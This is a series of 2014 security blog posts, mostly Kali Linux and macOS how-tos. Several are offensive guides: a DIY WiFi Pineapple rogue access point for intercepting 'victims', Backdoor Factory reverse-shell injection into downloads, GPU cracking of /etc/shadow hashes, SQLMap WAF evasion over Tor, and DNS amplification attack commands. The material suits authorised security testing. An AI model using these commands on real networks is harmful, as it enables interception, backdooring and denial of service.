Wednesday, December 17, 2014

HOWTO : Flash Plugin on Kali Linux 1.0.9a

Iceweasel

To install Flash :
apt-get install flashplugin-nonfree

To update Flash :
update-flashplugin-nonfree --install

Google Chrome

To install Flash :
apt-get install pepperflashplugin-nonfree

To update Flash :
update-pepperflashplugin-nonfree --install

That's all! See you.

Saturday, December 06, 2014

HOWTO : Fine Tune of iPad Mini 3 LTE

Personal Hotspot

By default, Personal Hotspot is hidden. You need to activate it by the following procedure :

(a) Settings - Cellular Data - Personal Hotspot - APN Settings - Personal Hotspot

(b) Enter some information at APN, Username and Password. Those information is not required to be real data.

(c) Exit and return, you will find Personal Hotspot option on the menu.

Cellular Data and Wifi Connection Timeout

(a) Settings - Touch ID & Passcode

(b) Enable iPad Unlock, Enable Require Passcode

(c) Settings - General - Auto-Lock

(d) Set to Never. If you cannot find "Never", you need to go to Settings - General - Reset - Reset All Settings.

(e) Enable Lock/Unlock

The internet connection will not be timeout or disconnected even you close the smartcase cover, unless you quit the application.

Make sure your MacBook Air's Energy Saving setting is set to "Never" when it is using battery. Meanwhile, the Energy Saving setting is set to prevent computer sleeping when using power adapter. However, I encounter some problem when connecting the shared wifi. I think we should wait for the release of 10.10.2 for the wifi fix.

In addition, the Personal Hotspot share with Bluetooth is awesome. It is stable and fast but with the distance limitation. It is the alternative of the wifi share at the moment.

That's all! See you.

Friday, December 05, 2014

HOWTO : Sandboxing Firefox on Mac OS X Yosemite (10.10.1)

Step 1 :

Go to the Apple Apps Store to install the current version of XCode if you do not have it installed.

Step 2 :

Install Homebrew if you do not have it installed.

sudo ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

To test the install if it is success or not :

brew doctor

Step 3 :

Install git if you do not have it installed.

brew install git

Step 4 :

cd /Users/Shared/

sudo git clone https://github.com/pansen/macos-sandbox-profiles.git

Step 5 :

cd /Applications/Firefox.app/Contents/MacOS/
sudo mv firefox-bin firefox-bin.real
sudo ln -sf /Users/Shared/macos-sandbox-profiles/bin/firefox-bin .


Step 6 :

Quit the Firefox if it is still running (not just close the browser) and then restart it.

That's all! See you.

Thursday, December 04, 2014

HOWTO : ArpON on Kali Linux 1.0.9a

ArpON (ARP handler inspection) is a portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. It blocks also the derived attacks by it, which Sniffing, Hijacking, Injection, Filtering & co attacks for more complex derived attacks, as: DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

Step 1 :

apt-get update
apt-get install arpon


Step 2 :

nano /etc/default/arpon

Uncomment the DARPI and RUN, makes it looking as :

DAEMON_OPTS='-q -f /var/log/arpon/arpon.log -g -d"
RUN="yes"


Step 3 :

Reboot your Kali Linux.

REFERENCE

ArpON - ARP Handler Inspection
Protect you from being ARP spoofing

That's all! See you.

HOWTO : ArpON on Mac OSX Yosemite (10.10.1)

ArpON (ARP handler inspection) is a portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. It blocks also the derived attacks by it, which Sniffing, Hijacking, Injection, Filtering & co attacks for more complex derived attacks, as: DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

Step 1 :

Go to the Apple Apps Store to install the current version of XCode if you do not have it installed.

Step 2 :

Install Homebrew if you do not have it installed.

sudo ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

Step 3 :

To test the install if it is success or not :

brew doctor

Step 4 :

brew install git
brew install cmake
brew install libdnet
brew install libnet

brew link libdnet


Step 5 :

cd ~
sudo git clone git://git.code.sf.net/p/arpon/code arpon

sudo -sH
cd arpon
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr ..
make
make install


exit

Step 6 :

cd ~
nano arpon_startup

/usr/sbin/arpon -i en0 -D -q


chmod +x arpon_startup

Step 7 :

sudo nano /System/Library/LaunchDaemons/org.arpon.startup.plist



*** Please note that where "samiux" is my username, change to your username accordingly.

Step 8 :

Reboot your Mac.

REFERENCE

ArpON - ARP Handler Inspection
Installing Homebrew on OS X Yosemite 10.10, Package Manager for Unix Apps
Protect you from being ARP spoofing

That's all! See you.

Tuesday, November 04, 2014

Blueberry - The Wifi Pineapple Mark V


Hardware

(1) TP-Link TL-MR3020 ver. 1.x (ver. 1.9 at the time of this writing)
(2) SanDisk Cruzer Fit USB Flash Drive (8GB)

Software

(1) OpenWrt
(2) Wifi Pineapple firmware
(3) Kali Linux 1.0.9a or Ubuntu Desktop 14.04 LTS

Wifi Pineapple is created by Hak5. It is a quite expensive device ($99.99-USD at the time of this writing). It is also named as Jasager (in German). The meaning in English is "Yes Man".

Wifi Pineapple is the Rouge Wifi Access Point (AP) to answer “Yes” to all Wifi probe requests by mobile devices. When a Wifi client is looking for an open SSID (no matter the SSID is) in Macdonald's Restaurant or in a cafe shop, the Pineapple (or Jasager) will reply “That’s Me!”. Once victims' mobile devices connected to Wifi Pineapple, you can carry out Man-in-the-Middle attack against the victims.

Now, we are going to make your Wifi Pineapple in less than $25-USD (TP-Link TL-MR3020 is about $20-USD while SanDisk Cruzer Fit USB Flash Drive is about $5-USD) and in a very easy way.

Step 1 :

To download the OpenWRT (Attitude Adjustment 12.09 - at this time of writing) :

If you are fresh install from the stock version of the TP-Link TL-MR3020 -
wget http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin

If you are upgrade from the previous installed OpenWRT -
wget http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-sysupgrade.bin

Configure your computer to static IP address :

IP address : 192.168.0.10
Gateway : 192.168.0.1


Connect the TL-MR3020 to your computer with cable. The default IP address of stock TP-Link TL-MR3020 is 192.168.0.254. Then browse to the stock IP address.

The username and password of the stock TP-Link TL-MR3020 are both "admin".

Go to the "System Tools" -- "Firmware Upgrade" to upgrade from the just downloaded .bin file.

Step 2 :

Once upgraded to OpenWRT, your device's IP address will changed to 192.168.1.1.

Configure your computer to static IP address :

IP address : 192.168.1.10
Gateway : 192.168.1.1


Then set the very STRONG root password at "System" -- "Administration".

Go to "System" -- "System" to set the timezone.

To enable wireless at "Network" -- "Wifi".

To enable DHCP at "Network" - "Interfaces" - "Edit" - select "DHCP Client" and select "OpenWrt" by clicking "Switch Protocol". If you take too much time to re-load the page, it is fine. It is because the IP address cannot be get. Just go ahead.

Now, connect your TL-MR3020 with ethernet cable to the internet. Then, connect your computer to the TL-MR3020 via wifi and the SSID is "OpenWrt". Make sure you can access to the internet.

Once you get the IP address, such as 192.168.1.100, you can connect to the TL-MR3020 via ssh.

ssh 192.168.1.100 -lroot

Enter your just created very STRONG root password.

Install the following packages :

opkg update
opkg install kmod-usb-storage
opkg install kmod-fs-ext4
opkg install block-mount


Step 3 :

Format your USB pendrive (8GB) as ext4 and swap, e.g. 2GB for swap (sda1) and 6GB for ext4 (sda2).

Then insert the USB pendrive to the TL-MR3020. Execute the following command line by line.

mkdir -p /mnt/sda2
mount /dev/sda2 /mnt/sda2
mkdir -p /tmp/cproot
mount --bind / /tmp/cproot
tar -C /tmp/cproot -cvf - . | tar -C /mnt/sda2 -xf -
umount /tmp/cproot
umount /mnt/sda2


Step 4 :

/etc/init.d/fstab enable
/etc/init.d/fstab start


vi /etc/config/fstab

Change the content as the following :

config mount
        option target /
        option device /dev/sda2
        option fstype ext4
        option options rw,sync
        option enabled 1
        option enabled_fsck 0

config swap
        option device /dev/sda1
        option enabled 1


The following is the command for the vi if you do not familiar with vi :

i - go to the insert mode and ready for edit
Esc - exit from insert mode
:w - write the changes to the file
:q - quit the vi

Then type the following command to reboot the device :

reboot

Once it boot up again, you login to it via ssh.

To check if the USB pendrive is mounted as "/" or not :

mount
df


Step 5 :

Turn off the TL-MR3020 and take the USB Pendrive out from the TL-MR3020 and insert to your computer.

Back up the USB Pendrive to your computer.

mkdir mr3020
sudo cp -R /media/1234....1123/* ~/mr3020/
sudo cp -R ~/mr3020/lib ~/mr3020/lib-original


*** Where /media/1234....1123/ is different from yours.

You also need to make a backup of the /lib directory.

Do not take out the USB Pendrive from your computer.

Step 6 (Pineapple firmware installation):

Download the upgrade package of Pineapple (upgrade-2.0.4.bin at the time of this writing) to your computer, such as Kali Linux or Ubuntu :

wget -O upgrade-2.0.4.bin https://wifipineapple.com/index.php?downloads&download_mk5_upgrade=2.0.4

When using Ubuntu, you should issue "sudo". However, Kali Linux does not required.

Install firmware-mod-kit on your Kali Linux or Ubuntu if you do not have it :

sudo apt-get install firmware-mod-kit
sudo /opt/firmware-mod-kit/trunk/extract-firmware.sh upgrade-2.0.4.bin
cd fmk/rootfs


Copy the requested directories to the USB Pendrive.

sudo cp -R bin/* /media/1234....1123/bin/
sudo cp -R sbin/* /media/1234....1123/sbin/
sudo cp -R usr/* /media/1234....1123/usr/
sudo cp -R etc/* /media/1234....1123/etc/
sudo cp -R www/* /media/1234....1123/www/
sudo cp -R pineapple /media/1234....1123/
sudo cp -R lib/firmware/* /media/1234....1123/lib/firmware/
sudo cp lib/* /media/1234....1123/lib/
sudo cp lib/wifi/* /media/1234....1123/lib/wifi/

sudo cp ~/mr3020/etc/config/fstab /media/1234....1123/etc/config/
sudo cp ~/mr3020/etc/passwd /media/1234....1123/etc/
sudo cp ~/mr3020/etc/shadow /media/1234....1123/etc/
sudo cp -R ~/mr3020/lib-original /media/1234....1123/


Step 6a :

To allow the victim to surf the internet via Pineapple, you need to change the DNS and Gateway at /etc/config/network from 172.16.42.1 to 172.16.42.42. Or, to change the DNS to 8.8.8.8

Step 7 :

Insert back the USB Pendrive to TL-MR3020.

Switch on TL-MR3020 and until it is booted up. Run "wp5.sh" script (at Step 8) at your computer. Browse the IP address that is showing on the screen. You will be asked to enter the password twice for the initial login. You should enter the previous STRONG root password.

Step 8 (Connectivity) :

The following is one of the ways to use the Pineapple (TL-MR3020) by the way of tethering :

Connect your laptop to internet via wireless or 3G.

Then connect the CAT5/5e/6 cable to the Pineapple and your laptop.

At the laptop, download the script.

wget http://www.wifipineapple.com/wp5.sh
chmod +x wp5.sh
sudo ./wp5.sh




Now, your computer (laptop) can access internet and also can access the TL-MR3020. Victims can also access the internet when they connected to your Pineapple.

Once you want to reset what wp5.sh set, you need to run the following script that is created by me.

sudo ./killwp5.sh



When the TL-MR3020 is rebooted, you need to run wp5.sh again to get the access.

Important Note

There are THREE important things you should NOT do, otherwise, you will brick the TL-MR3020. They are :

First - Do NOT upgrade the OpenWrt from the web interface as the USB pendrive will not be mounted. Unless, you install the related packages again as above stated.

Second - Do NOT upgrade the Pineapple in the normal way (that is via the web UI or Pineapple). Make sure keep away from the /lib directory. Or, if you have a backup, you can copy the /lib directory back.

Third - Do NOT long press the "WPS/Reset" button on the TL-MR3020; otherwise, the OpenWrt will be reset and the USB pendrive cannot be mounted. Unless, you install the related packages again as above stated.

Remarks

Victims need to had connected to any open wifi before; otherwise, Karma will not work.

Make sure the TL-MR3020 is version 1.x, other versions may brick the TL-MR3020.

The ONLY way to upgrade the Pineapple firmware is by following Step 6. In addition, you can upgrade from Mark IV (by this tutorial) to Mark V by following the Step 6 only.

Some infusions may not working on Blueberry as it is not the original one. For example, (1) the WPS infusion does not work as designed on Blueberry as it has only one wifi card. You cannot provide the internet connection to the victims and conduct WPS hacking at the same time. (2) The PineAP and Reconnaissance on AP & Client do not work as designed on Blueberry as it has only one wifi card too.

Know Issues

The external Wifi Dongle, such as Realtek 8187L does not work even the driver is installed and loaded. The limitation of Blueberry is that it cannot provide internet access to the victims and doing the attacks at the same time (for some of the attacks), such as WPS attacks.

It is still a good try to the Blueberry before you considering to purchase an original Wifi Pineapple Mark V.

Reference

Wifi Pineapple Mark V -
Pineapple Mark V WiKi
Pineapple Forums
Hak5
PhiberOptics Youtube
Code injection to the downloading binaries

Wifi Pineapple Mark IV -
The beginners guide to breaking website security with nothing more than a Pineapple
Getting Started with the Wi-Fi Pineapple IV (Video)
Security4Plus Youtube Channel (Video)
How To: Configure a WiFi Pineapple For Use With Mac OS X (Video)
The Wifi Pineapple Book - Free Download
WiFi Pineapple – First Impression
You just can't trust wireless: covertly hijacking wifi and stealing passwords using sslstrip
All about WiFi Pineapple (Video)

That's all! See you.

Tuesday, October 28, 2014

Do Not Trust Your Download Even It Is From The Trusted Source

Joshua Pitts developed a tool suite for injecting backdoor to executable files of Windows, Linux and Mac OSX as well as FreeBSD. The process is fully automatically even you do not know what code cave is.

The tool suite is namely The Backdoor Factory and it also comes with a proxy to inject the backdoor while the victim is downloading the binaries - BDFProxy. The BDFProxy is working for HTTP protocol only.

Joshua Pitts discovers that one of the Tor Network Exit Nodes doing code injection to the binaries which are downloaded by victims via Tor network. His blog is showing how it will be and the interview report is talking about that.





How to install BDFactory on Kali Linux 1.0.9a?

BDFactory is working very well with Metasploit Framework.

apt-get update
apt-get dist-upgrade
apt-get autoclean
apt-get --purge autoremove

apt-get install python-pip


Install BDFactory :

cd ~
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
./install.sh


To update :
./update.sh

Install BDFProxy :

cd ~
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
./install.sh


To update :
./update.sh

Usage of BDFactory :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp


Usage of BDFProxy :

nano bdfproxy.cfg

*change the settings when necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc

*if you are working with Pineapple, you need run ./wpBDF.sh to configure your environment

Conclusion

Don't trust your downloaded binary even it is downloaded from the trusted source when it is delievered via HTTP. Meanwhile, please download binaries in Tor network with care.

Please DO NOT use this tool suite for illegal purpose; otherwise, you will be put into the jail.

REFERENCE

Evasion of Anti-Virus with Veil Framework and The Backdoor Factory
Transparently proxify virtual machines
Transparent Proxy (Linux)
Framework for Man-In-The-Middle Attack
HOWTO : Protect You From Being ARP Spoofing

That's all! See you.

Thursday, October 16, 2014

VULNERABLE : Poodle SSLv3 Vulnerability

What is Poodle Vulnerability?

Google researchers have discovered a security vulnerability in SSL 3.0 that allows attackers to decrypt encrypted website connections. The details is in here.

However, some security experts disagree that the bug is particularly serious and they think that it only affect the public wifi.

How to exploit it?

Daniel Fox Franke wrote in his blog to explain how to exploit the vulnerability.

How to test the browsers vulnerability?

Qualys provides a tester online for the browsers testing. Or, you can try another tester online.

How to test the server vulnerability?

Qualys provides server test online for the server testing.

How to fix the browsers vulnerability?

There is a tutorial to show you how to fix them.

How to fix the common servers vulnerability?

There is a tutorial to show to you how to fix the vulnerability on common servers.

That's all! See you.

Thursday, October 02, 2014

HOWTO : CUDA with Kali Linux 1.0.9

Hardware

CPU : Intel i7-3930K
RAM : 32GB DDR3
Hard Drive : 3TB
Display Card : Two nVidia GeForce GTX 590

Install Kali

Install Kali Linux 1.0.9 on the box as usual. Make sure "secure boot" is disabled in your BIOS before installing. After that, you update the Kali accordingly.

apt-get update
apt-get dist-upgrade


Install nVidia Driver

apt-get install -y linux-headers-$(uname -r)
apt-get install nvidia-kernel-dkms nvidia-cuda-toolkit nvidia-xconfig

nvidia-xconfig

sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
update-grub
reboot


Fix the nvidia_uvm error

After the reboot :

cd /usr/src/nvidia-current-331.67
make

cp Module.symvers uvm/
make -C uvm

cp uvm/nvidia-uvm.ko /lib/modules/`uname -r`/updates/dkms


Install cudaHashcat

mkdir hacking
cd hacking

wget http://hashcat.net/files/cudaHashcat-1.30.7z

7za x cudaHashcat-1.30.7z


Test the cudaHashcat

cd /root/hacking/cudaHashcat-1.30/
./cudaExample0.sh

cd /root/hacking/cudaHashcat-1.30/
./cudaExample400.sh

cd /root/hacking/cudaHashcat-1.30/
./cudaExample500.sh


Install John the Ripper

apt-get install libssl-dev

cd hacking

wget http://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz
tar -xvzf john-1.7.9-jumbo-7.tar.gz
cd john-1.7.9-jumbo-7/src

make
make clean linux-x86-64-cuda


** If your hashes or passwords are longer than 8 characters, you need to change the following before compiling the John.

cd john-1.7.9-jumbo-7/src
nano params.h


Then change from "8" to "18" or "20" and etc.

#define CHARSET_LENGTH 8

Test the John the Ripper

cd /root/hacking/john-1.7.9-jumbo-7/run

./john --device=0,1,2,3 --format=sha512crypt-cuda /etc/shadow


* since I have 4 GPUs, so the --device should be 4.

*** When you changed the CHARSET_LENGTH, you need to generate a new charset. Do it once only.

wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip2 -d rockyou.txt.bz2
cp rockyou.txt /root/hacking/john-1.7.9-jumbo-7/run

cd /root/hacking/john-1.7.9-jumbo-7/run

cat rockyou.txt | sed 's/^/:/' > rockyou.pot

mv all.chr all.chr-original
mv alnum.chr alnum.chr-original
mv alpha.chr alpha.chr-original
mv digits.chr digits.chr-original
mv lanman.chr lanman.chr-original

./john --pot=rockyou.pot --make-charset=all.chr
./john --pot=rockyou.pot --make-charset=alnum.chr --external=filter_alnum
./john --pot=rockyou.pot --make-charset=alpha.chr --external=filter_alpha
./john --pot=rockyou.pot --make-charset=digits.chr --external=filter_digits
./john --pot=rockyou.pot --make-charset=lanman.chr --external=filter_lanman


Then your cracking command will be :

./john --pot=rockyou.pot --device=0,1,2,3 --format=sha512crypt-cuda /etc/shadow

Install and Test Cryptohaze

cd hacking
wget http://sourceforge.net/projects/cryptohaze/files/Cryptohaze-Linux_x64_1_31a.tar.bz2/download -O Cryptohaze-Linux_x64_1_31a.tar.bz2

tar xjvf Cryptohaze-Linux_x64_1_31a.tar.bz2

cd /root/hacking/Cryptohaze-Linux
./Cryptohaze-Multiforcer -h NTLM -c charsets/charsetall -f test_hashes/Hashes-NTLM-Full.txt


That's all! See you.

Wednesday, October 01, 2014

HOWTO : Uninstall a specific software/package in Kali Linux 1.0.9

Since I need to run Ollydbg for a while, I then installed Wine in Kali Linux. When I no longer require Ollydbg, I would like to uninstall Wine. However, there are a lot of dependencies for the Wine. When you uninstall Wine with the following command, you will uninstall a lot of software or packages that may be useful for you, such as Gnome.

apt-get --purge remove wine

A more safety way to uninstall Wine should be as the following :

dpkg --remove --force-depends wine-bin
dpkg --remove --force-depends wine


That's all! See you.

Sunday, September 28, 2014

Kali Linux Nexus NetHunter

The official site is here. The setup guide is here.


Kali Linux NetHunter HID Attack from Offensive Security on Vimeo.

A quick demonstration of the Kali Linux NetHunter HID attack (Teensy like), by Offensive Security.



Kali Linux NetHunter "Bad USB" MITM Attack from Offensive Security on Vimeo.

The Kali Linux NetHunter implementation of the "Bad USB" MITM attack as demonstrated by the guys from srlabs.de at BlackHat 2014.




That's all! See you.

Thursday, September 04, 2014

REVIEW : ZOTAC ZBOX C1320 Nano Plus

I am going to test ZOTAC ZBOX C1320 Nano Plus with Kali Linux 1.0.9 64bit.

CPU : Intel Celeron N2930 (Quad-core, 1.83GHz, up to 2.16GHz)
GPU : Intel HD Graphic
RAM : 1 x DDR3L-1333 SO-DIMM (2GB Included)
HDD : 1 x 2.5-inch SATA 3.0Gb/s (64GB SSD Included)
Ethernet : Realtek Gigabit LAN
Wireless : IEEE802.11ac Intel Wifi
Bluetooth : 4.0
Remarks : 1 x SD/SDHC/SDXC Card Reader, 1 x HDMI, 1 x DisplayPort, 1 x eSATA, 4 x USB 3.0, 2 x USB 2.0

You can select UEFI or BIOS when doing setup. You also can disable the Secure Boot.

It is no problem to boot up Kali Linux 1.0.9 64bit. However, the wifi is partially working. It detects the signal but cannot work. The bluetooth is malfunction too. 1080p MKV video cannot be played on default Kali Linux install. The CPU has no Hyper-Threading feature. However, this box can use standard DDR3 RAM up to 8GB. You are not required to use DDR3L RAM. Meanwhile, the sound card is quite good.

This box is working very well with VMWare Workstation 10.x (64-bit). The 64bit guest virtual machine is working properly.

The power consumption is between 13W and 20W.

I recommend this box as its low power consumption with high performance.

Update :

HD video playback with the following drivers. However, the chipset is too new and it cannot be loaded properly :

sudo apt-get install i965-va-driver libva-intel-vaapi-driver vainfo

That's all! See you.

Tuesday, August 19, 2014

HOWTO : SQLMap for Cloudflare protected sites

When you suspect your target site is vulnerable to SQLi and you find out that it is protected by Cloudflare, you can still to launch SQLMap against the target.

First of all, you need to make sure the target site is protected by Cloudflare, you can add "--identify-waf" or "--check-waf" to confirm. However, do not set "--thread=" larger than 1 as the target will give you "403 Forbidden" error. Once you get the "403 error", your IP address is banned. Therefore, you are required to consider to use proxy servers or TOR to access the target.

Secondary, you need to add "--tamper='between,randomcase,space2comment'" and "-v 3", if the target is confirmed being protected by Cloudflare. You may also consider to add "--random-agent" and "--tor" when necessary.

Finally, do not use Kali Linux provided SQLMap scripts as it has no "WAF" scripts pre-installed. You are better to download the latest version of SQLMap from the official site.

git clone https://github.com/sqlmapproject/sqlmap.git

This hint can be applied to other WAFs, IDSs and IPSs, such as mod_security or other Cloudflare like service providers.

For example :

python sqlmap.py -u "https://www.cloudflare.com/" --check-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor

That's all! See you.

Friday, July 18, 2014

Defense your Network and Servers

Intruders will conduct reconnaissance on your network and servers before performing the attack. After that, intruders will perform the attack based on the information in hand.

In my opinion, the best way to defense your network and servers from being attacked is to interfere with the intruders' reconnaissance. When intruders cannot get any valuable information, they cannot perform the attack properly.

Most of the intruders use automatic tools, such as vulnerability scanners, to perform the reconnaissance and they seldom do it manually as it is harder for them especially for web applications. However, a small portion of advanced intruders may do it manually.

Hiawatha, a secure and advanced web server, can be configured to block vulnerability scanners from scanning the web server. Since the vulnerability scanners do not work properly, intruders cannot get any valuable information on the web server in order to launch an attack.

Suricata, a high performance network IDS, IPS and network security monitoring engine, used with Emerging Threats rules can be configured to drop the packet of the vulnerability scanners from scanning.

Web Application Firewall (WAF) and Intrusion Detection/Prevention System (IDS/IPS) as well as firewall can be bypassed by some of the advanced intruders. Therefore, blocking the vulnerability scanners is one of the good ways to defense your network and server from being attacked.

That's all! See you.

Tuesday, July 15, 2014

Thursday, July 03, 2014

HOWTO : ECS LIVA Mini PC Kit on Ubuntu 14.04 LTS

ECS Liva Mini PC kit is the smallest x86 PC in the world so far. The BIOS is UEFI, so that only Ubuntu besides Windows 8.1 can be installed on it. I select to install with LVM.

You may need a powered USB hub to connect the keyboard and mouse as well as install device (such as USB DVD-ROM or USB pendrive). Since it comes with 32GB/64GB eMMC (SSD drive), you may required to connect to an external hard drive for more storage.

The maximum power consumption is about 12W under Ubuntu 14.04 LTS.

The sound and network device are working out of the box. However, the wireless and bluetooth devices do not work properly even you download the wireless driver from the official site (it is still beta at the moment).

After some tries and fails, I finally make the wireless device working. However, the bluetooth device does not work at the moment.

How I make the wireless device working? Here you are :

Step 1 :

Write down the MAC address of the wireless card.

Step 2 :

Download the beta driver from the official site. Extract it and go to ~/Downloads/Ubuntu/WLAN.

Rename the "brcmfmac-sdio.txt" to "brcmfmac-43241b4-sdio.txt".

mv brcmfmac-sdio.txt brcmfmac43241b4-sdio.txt

Change the "macaddr" at brcmfmac43241b4-sdio.txt to the previous written down MAC address.

e.g. macaddr=24:0a:64:4c:43:34

Step 3 :

Move the /lib/firmware/brcm directory to another place.

sudo mv /lib/firmware/brcm ~/Downloads/

Step 4 :

Install git package.

sudo apt-get install git

Download the wireless firmware.

cd ~/Downloads
git clone git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git


After that copy the ~/Downloads/linux-firmware/brcm to /lib/firmware/.

sudo cp -R ~/Downloads/linux-firmware/brcm /lib/firmware/

Copy the brcmfmac43241b4-sdio.txt to /lib/firmware/brcm/.

sudo cp ~/Downloads/Ubuntu/WLAN/brcmfmac43241b4-sdio.txt /lib/firmware/brcm/

Step 5 :

Comment out the blacklist.

sudo nano /etc/modprobe.d/blacklist.conf

Locate "blacklist bcm43xx" and make it to "#blacklist bcm43xx".

Step 6 :

Reboot the box.

However, the wifi signal is not very strong indeed.

Remarks

You may need to do some changing on the box with the following package :

sudo apt-get install libavcodec-extra
sudo apt-get install indicator-cpufreq


To increase the performance, you need to NOT to use SWAP.

sudon nano /etc/rc.local

Insert the following before "exit 0" :

sysctl -w vm.swappiness=0

Then, reboot your box.

For the video playback, you are required to install the following packages.

sudo add-apt-repository ppa:sander-vangrieken/vaapi
sudo apt-get update
sudo apt-get install mplayer-vaapi gstreamer1.0-vaapi gstreamer1.0-libav libva-intel-vaapi-driver vainfo mencoder-vaapi


That's all! See you.

Link : 10 things to do after installing Ubuntu


Wednesday, July 02, 2014

Tsunami - DNS Amplification Attack Tool

Tsunami is a DNS Amplification Attack Tool which is collected from the internet and modified by Samiux. It is designed for testing your server and/or network under the DNS Amplification Attack. Perform this test on any server and/or network without authorization is a crime and you will be put into a jail.

The number of open recursive DNS servers and the bandwidth of the attacker as well as duration may affect the traffic volume size of the attack.

Tsunami is working perfectly on Kali Linux 1.0.7 or above. The official site is at here.

Usage



To perform DNS Amplification attack :

python amplfiy.py -t 1.2.3.4 -s open_dns.txt -a domain_name.txt -c -1 --verify -v --threads=1000

*where 1.2.3.4 is the victim's IP address

To scan for the open recursive DNS server :

perl find_open_resolvers.pl '1.0.0.0 - 1.84.255.255' -q 1000

Remarks : this script just can check if the DNS server has the RA flag or not only. You need to double check with the following command to confirm the scanned DNS server is a true open recursive DNS server.

dig ANY isc.org @samsung.idv.tw

*where samsung.idv.tw is the open recursive DNS server
where isc.org is the domain to lookup

Tsunami comes with the following files :

amplfiy.py - the attack script
find_open_resolvers.pl - the scanner script
gov-uk_domain.txt - domain names of UK Government
open_dns_1.0.0.0-1.84.255.255.txt - open recursive DNS list within 1.0.0.0 and 1.84.255.255 IP range

That's all! See you.